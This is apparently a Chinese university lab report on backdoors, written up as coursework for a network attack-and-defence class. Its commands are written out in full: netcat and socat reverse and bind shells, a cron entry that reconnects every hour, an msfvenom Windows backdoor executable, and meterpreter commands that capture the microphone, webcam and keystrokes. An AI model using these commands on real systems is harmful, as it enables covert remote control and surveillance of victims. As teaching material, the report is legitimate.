20155218《网络对抗》Exp2 后门原理与实践

常用后门工具实践

1.Windows获得Linux Shell:

在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功获得了一个Kali的shell,运行ls指令如下:

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

MAC获得linux Shell:

同Windows环境下基本相似

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

遇到的问题:在防火墙关闭的情况下无法ping通,无法控制:

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

解决的方法:配置出入站规则

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

2.使用netcat获取主机操作Shell,cron启动

先在Windows系统下,监听端口5218,用crontab -e指令编辑一条定时任务,在最后一行添加15 * * * * /bin/netcat 172.16.167.176 5218 -e /bin/sh,意思是在每个小时的第15分钟反向连接Windows主机的5218端口:

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

3.使用socat获取主机操作Shell, 任务计划启动:

socat是ncat的增强版,它使用的格式是socat [options]
,其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

过程:

  1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

  2. 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5218 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5218,同时把cmd.exe的stderr重定向到stdout上:

  3. 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

    20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

  4. 此时,在Kali环境下输入指令socat - tcp:172.16.167.177:5218,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5218端口,此时可以发现已经成功获得了一个cmd shell:

    20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

4.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

实验步骤:

  1. 输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=1888 -f exe > 1888_backdoor.exe
  1. 通过nc指令将生成的后门程序传送到Windows主机上:

    20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

  2. 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

    20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

  3. 设置完成后,执行监听,打开Windows上的后门程序:此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

5.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令可以截获一段音频:使用webcam_snap指令可以使用摄像头进行拍照;使用webcam stream指令可以使用摄像头进行录像;使用screenshot指令可以进行截屏;使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录;

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

20155218《网络对抗》Exp2 后门原理与实践-LMLPHP

5 基础问题

1. 例举你能想到的一个后门进入到你系统中的可能方式?

  • 一个比较常见的方法就是下载一些破解软件,非正版软件,其中很容易隐藏后门程序;

2. 例举你知道的后门如何启动起来(win及linux)的方式?

  • 通过远程控制启动
  • 通过定时启动
  • 通过与应用程序绑定进行启动

3. Meterpreter有哪些给你映像深刻的功能?

可以录像和记录键盘

4. 如何发现自己有系统有没有被安装后门?

  • 安装杀毒软件进行检查
  • 手动查看任务计划程序、开机自启动项中查找有关可疑程序。
04-25 05:57